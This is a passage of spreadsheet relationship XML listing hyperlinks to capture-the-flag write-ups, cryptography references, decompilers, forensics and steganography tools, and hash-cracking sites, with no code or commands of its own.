Target="http://stackoverflow.com/questions/13663604/questions-about-the-nacl-crypto-library/13663945" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Coppersmith%27s_attack" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Pigpen_cipher" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Affine_cipher" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cgsecurity.org/wiki/TestDisk" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.truedigitalsecurity.com/blog/2015/09/22/csaw-2015-crypto-500-bricks-of-gold-writeup/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashkiller.co.uk/default.aspx" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastahyeti/the-blog/blob/master/solution.md" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wmbriggs.com/post/1001/" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Padding_oracle_attack" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.google.com/archive/p/lxyppc-snake/source" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashes.org/crackers.php" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ctfs/write-ups-2014/blob/master/asis-ctf-quals-2014/archaic/Merkle_Hellman_Attacks.pdf" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/abpolym/crypto-tools/tree/master/rot" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/abpolym/crypto-tools/tree/master/poemcode" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://rumkin.com/tools/cipher/playfair.php" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Length_extension_attack" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ius/rsatool/blob/master/rsatool.py" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.msoos.org/2014/04/cryptominisat-4-released/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/abpolym/crypto-tools/tree/master/handycode" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cryptool.org/en/cryptool1" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Slide_attack" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mathiasbynens.be/notes/pbkdf2-hmac" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/google/keyczar"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hexpresso.wordpress.com/2015/04/05/quals_ndh-2k15-mass-surveillance-software-300-writeup/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://uaf.io/reverse%20engineering/2015/07/25/WhiteHat-Contest-10-RE-300.html" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ByteBandits/writeups/blob/master/whitehat-grand-prix-quals-2015/reversing/dong%20wan/sudhackar/README.md" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/alex/python-decompiler" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/en/ip-address/222.255.46.146/information/" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing5.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gstarnberger/uncompyle" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mrc.uidaho.edu/mrc/people/jff/digital/MIPSir.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.decompileandroid.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.javadecompilers.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/X86_assembly_language" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.broadcom.com/docs/support/videocore/VideoCoreIV-AG100-R.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://retdec.com/decompilation/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elfmaster/sherlocked" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pwning/public-writeup/blob/master/9447ctf2014/misc/polydata/polydata.md" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hermanhermitage.github.io/videocore-disjs/dis.html" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hxp.io/blog/18/MMACTF%202015:%20Reversing%20150%20%22Impossible/?%22%20writeup/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/duc-le/ctf-writeups/blob/master/2015_hack.lu_CTF/%2324_Zoo/writeup.md" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/smokeleeteveryday/CTF_WRITEUPS/tree/master/2015/MMACTF/reversing/simple_hash" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cs.cornell.edu/courses/cs3110/2008fa/lectures/lec21.html" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sebastianbiallas/ht" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ctfhacker.com/ctf/pwnable/2015/09/07/mmactf-moneygame.html" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/smokeleeteveryday/CTF_WRITEUPS/tree/master/2015/NUITDUHACK/reverse/crackmeprime" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/smokeleeteveryday/CTF_WRITEUPS/tree/master/2015/NUITDUHACK/reverse/clarkkent" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/crunch-wordlist/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pid.gamecopyworld.com/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/fceultra/?source=typ_redirect" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lcamtuf.coredump.cx/afl/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://archive.rpgclassics.com/subsites/twit/docs/text/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kozos.jp/vmimage/burning-asm.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.genymotion.com/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://riscv.org/software-tools/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/nurikabedotnet/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://klee.github.io/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/smokeleeteveryday/CTF_WRITEUPS/blob/master/2015/DEFCONCTF/reversing/accesscontrol/solution/accesscontrol_crack.py" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pcre.org/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rubinius/rubinius/tree/40040f9956833ac13774d745e961c743eeeefcbb" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0xEBFE/3DSX-IDA-PRO-Loader" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/spreadsheets/d/17Cbg52OKEnkU7v5iOrxbVRN-GlODHMxH8V_JIrqnpgc/edit" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Drahflow/Elymas" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.telerik.com/products/decompiler.aspx" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sourceforge.net/projects/easypythondecompiler/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hte.sourceforge.net/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/smokeleeteveryday/CTF_WRITEUPS/blob/master/2015/ASISCTF/reversing/dark/solution/dark_descramble.py" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/smokeleeteveryday/CTF_WRITEUPS/blob/master/2015/ASISCTF/reversing/tera/solution/tera_decoder.py" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/smokeleeteveryday/CTF_WRITEUPS/blob/master/2015/ASISCTF/reversing/selfie/solution/selfie_descramble.p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fadec0d3.blogspot.com/2015/09/csaw-2015-recon-trivia.html" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/PDF32000_2008.pdf" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fadec0d3.blogspot.com/2015/09/csaw-2015-recon-trivia.html" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.myportablesoftware.com/freefilecamouflage.aspx" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://asecuritysite.com/scalpel.conf.txt" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/volatilityfoundation/volatility" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.nviso.be/2015/04/cyber-security-challenge-belgium-2015_15.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stripfile.py" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://images.google.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.openwall.com/john/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xdebug.org/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.ietf.org/html/rfc913" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/File_Transfer_Protocol" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://rumkin.com/tools/cipher/caesar-keyed.php" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://steghide.sourceforge.net/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dialabc.com/sound/detect/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.ietf.org/html/rfc4648" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Z3Prover/z3" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing6.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cjdelisle/cjdns" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://esolangs.org/wiki/Brainloller" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ctfs/write-ups-2015/blob/master/asis-quals-ctf-2015/stego/blind/pixels.py" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secdev.org/projects/scapy/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/philipl/pifs" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://piwik.org/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.w3schools.com/jsref/prop_loc_hash.asp" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hyperboria.net/" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.skullsecurity.org/Passwords" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/reyammer/csawctf-quals-2015-pcapin/blob/master/decrypt.py" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=68BjP5f0ccE" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://steghide.sourceforge.net/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tineye.com/" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://citp.princeton.edu/research/memory/code/" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.volatilityfoundation.org/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.google.com/archive/p/origami-pdf/wikis/GettingStarted.wiki" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ctfs/write-ups-2015/blob/master/mma-ctf-2015/stego/miyako-350/pixels.py" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.thonky.com/qr-code-tutorial/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cryptome.org/2015/09/tempest-test-for-windows.htm" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://md5decrypt.net/en/Sha256/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.didierstevens.com/2015/04/16/pdf-parser-a-method-to-manipulate-pdfs-part-1/" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ctfs/write-ups-2015/blob/master/mma-ctf-2015/stego/miyako-350/picdiff.py" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.synalysis.net/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/hex2bin/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ridiculousfish.com/hexfiend/" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Intel_HEX" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.synalysis.net/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cheatengine.org/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/USArmyResearchLab/Dshell" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://doegox.github.io/ElectronicColoringBook/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mattmahoney.net/dc/zpaq.html" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.computing.surrey.ac.uk/personal/st/J.Heather/teaching/crypto/2011/presentations/biham94known.pdf" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ctfs/write-ups-2015/blob/master/pragyan-ctf-2015/stegano/emma_watson/carve.py" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ctfs/write-ups-2015/blob/master/pragyan-ctf-2015/misc/255_255_255_is_the_best_color/go.py" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.free-ocr.com/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zxing.org/w/decode.jspx" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kloth.net/services/cardpunch.php" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.matthias-ernst.eu/malbolge/malbolge" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nginx.org/en/docs/beginners_guide.html" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ctfs/write-ups-2015/blob/master/seccon-quals-ctf-2015/stegano/steganography-1/scalpel.conf" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://rumkin.com/tools/cipher/baconian.php" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ctfs/write-ups-2015/blob/master/hack-dat-kiwi-ctf-2015/stegano/simple-stegano/pixels.py" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.spammimic.com/index.cgi" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/YASME-Tim/crypto-tools/tree/master/crackmd5" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/ndefilippis/b1d8e5a954d717734ca8" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Linux_Unified_Key_Setup" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://29a.ch/photo-forensics/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ctfs/write-ups-2015/blob/master/hack-dat-kiwi-ctf-2015/stegano/simple-stegano/getbinary.py" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/MITRECND/chopshop" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/MITRECND/chopshop/blob/master/modules/poisonivy_23x.py" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Camellia_(ciph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tapebagel.py" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://Node.js/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tuxnes.sourceforge.net/gamegenie.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pypi.python.org/pypi/pycosat" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Graham_scan" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa299374(v=vs.60).aspx" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/p4-team/ctf/blob/master/2015-09-26-trendmicro/captcha/captcha.py" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://b01lers.net/challenges/Trend%20Micro%20Qualifier%202015/Click%20on%20the%20Different%20Color/63/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Convex_hull" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Blossom_algorithm" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dakutenpura.hatenablog.com/entry/2015/09/07/214418" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Hopcroft%E2%80%93Karp_algorithm" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing7.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/p4-team/ctf/tree/master/2015-10-02-dctf/misc_400_captcha" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://scipy.github.io/devdocs/generated/scipy.spatial.ConvexHull.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.whitehatters.academy/legitbs-2015-blackbox/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/smokeleeteveryday/CTF_WRITEUPS/blob/master/2015/DEFCONCTF/coding/catwestern/solution/catwestern_solution.py" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RandomsCTF/write-ups/tree/master/Hack.lu%20CTF%202015/Perl%20Golf%20%5Bppc%5D%20(75)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Linear_congruential_generator" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Quine_(computing)" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RandomsCTF/write-ups/tree/master/Hack.lu%20CTF%202015/PHP%20Golf%20%5Bppc%5D%20(75)" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dakutenpura.hatenablog.com/entry/2015/09/07/172118" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stackoverflow.com/questions/12127833/patterns-possible-on-3x3-matrix-of-number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sourceforge.net/projects/jsolver/files/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Robustness_principle" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/NIST_hash_function_competition" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/ff621566.aspx" 